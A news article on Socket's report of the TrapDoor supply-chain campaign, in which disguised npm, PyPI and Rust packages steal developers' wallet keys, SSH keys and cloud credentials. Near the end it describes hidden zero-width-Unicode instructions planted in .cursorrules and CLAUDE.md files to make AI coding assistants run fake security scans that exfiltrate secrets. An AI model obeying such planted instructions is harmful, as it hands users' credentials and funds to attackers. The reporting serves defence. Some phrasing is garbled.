A new cryptocurrency theft campaign is targeting developers who are most likely to have wallet keys, cloud credentials, and production access on their machines.
Researchers at security firm Socket said earlier this week that they identified a supply chain attack called TrapDoor distributed across three major open source programming registries, with more than 34 malicious packages and hundreds of related versions and artifacts.
A key takeaway is that attackers are becoming more focused. In addition to social engineering, which targets people who possess key information, supply chain attacks are not designed to trap random retail users but rather developers. Those are the same people who can have wallet files, SSH keys, GitHub tokens, cloud credentials, and production access on the same machine they use to build crypto and AI tools.
Socket did not identify the victims or the stolen funds, but said the packages were active on npm, PyPI, and Crates.io and contained payloads that could steal wallet data, exfiltrate credentials, probe AWS and GitHub tokens, and leave files to maintain active access.
Packages written in JavaScript, Python, and Rust were disguised as developer aids, security scanners, wallet tools, Solidity utilities, AI prompt packages, and Sui or Move build aids.
Bored by design
The names were boring by design. The packages were called “wallet-security-checker,” “defi-risk-scanner,” “solidity-build-guard,” “move-compiler-tools,” and “llm-context-compressor,” and they looked like the kind of small utilities a crypto or AI developer might install without much thought.
However, once installed, the payloads attempted to extract much more than just package data.
In npm packages, the malware searched a developer’s machine for private keys, passwords, GitHub tokens, and cloud logins. It also tried some stolen credentials, attempted to enter other systems via SSH keys, and left behind files that could keep the infection active.
SSH keys are login files that developers use to access servers, code repositories, and other machines. If stolen, they can allow an attacker to move from a compromised laptop to a company’s broader infrastructure.
The attack also uses files such as .cursorrules and claude.md, which allow developers to give project-specific instructions to AI coding tools. Socket said the campaign planted hidden instructions using zero-width Unicode characters, apparently trying to get future AI assistant sessions to run fake “security scans” that collected and exfiltrated secrets.
That transformed the attack from a normal packet stealer to something more like malware for developer environments. Installing the package is just the first step, with the real target being the workstation, such as wallets, repositories, browser data, cloud keys, SSH access, and any AI encryption tools you read about below.
The Rust packages used malicious build.rs scripts to run during compilation, targeting sui and move developers. PyPI packages executed remote JavaScript on import. Packages in npm used post-install hooks.
Socket said it reported the packets to the affected registries and classified the campaign packets as malicious. The company also warned that the attacker opened pull requests for development and AI projects, attempting to add .cursorrules and CLAUDE.md files via normal open source contribution paths.
